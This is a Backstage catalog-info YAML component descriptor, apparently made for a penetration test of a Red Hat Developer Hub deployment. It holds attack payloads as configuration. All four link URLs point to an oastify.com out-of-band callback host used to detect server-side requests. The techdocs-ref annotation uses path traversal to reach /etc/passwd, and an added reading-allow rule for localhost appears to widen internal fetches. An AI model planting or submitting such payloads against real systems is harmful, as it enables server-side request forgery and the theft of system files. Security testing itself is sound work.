apiVersion: backstage.io/v1alpha1
kind: Component
metadata:
  name: rhdh-pentest
  links:
    - title: Website
      url: http://479jpj9ks5njugi3tn2z1otnoeu5i26r.oastify.com
    - title: Documentation
      url: https://479jpj9ks5njugi3tn2z1otnoeu5i26r.oastify.com
    - title: Storybook
      url: https://479jpj9ks5njugi3tn2z1otnoeu5i26r.oastify.com
    - title: Discord Chat
      url: https://479jpj9ks5njugi3tn2z1otnoeu5i26r.oastify.com
  annotations:
    github.com/project-slug: rhdh-sec-test2/rhdh-pentest
    backstage.io/techdocs-ref: url:https://localhost/../../../../etc/passwd
    argocd/app-name: 'rhdh-pentest'
    backstage.io/kubernetes-id: 'rhdh-pentest'
    quay.io/repository-slug: rhdh-sec-test2/rhdh-pentest
    backstage.io/kubernetes-namespace: rhdh-pentest
    sonarqube.org/project-key: rhdh-pentest
  tags:
    - java
backend:
  reading:
    allow:
      - host: 'localhost'
spec:
  type: other
  lifecycle: unknown
  owner: rhdh-test-org/pentest
  system: rhdh-pentest-system
  dependsOn:
    - resource:pgdb
    - resource:argocd
    - resource:obc
    - resource:keycloak
    - resource:github
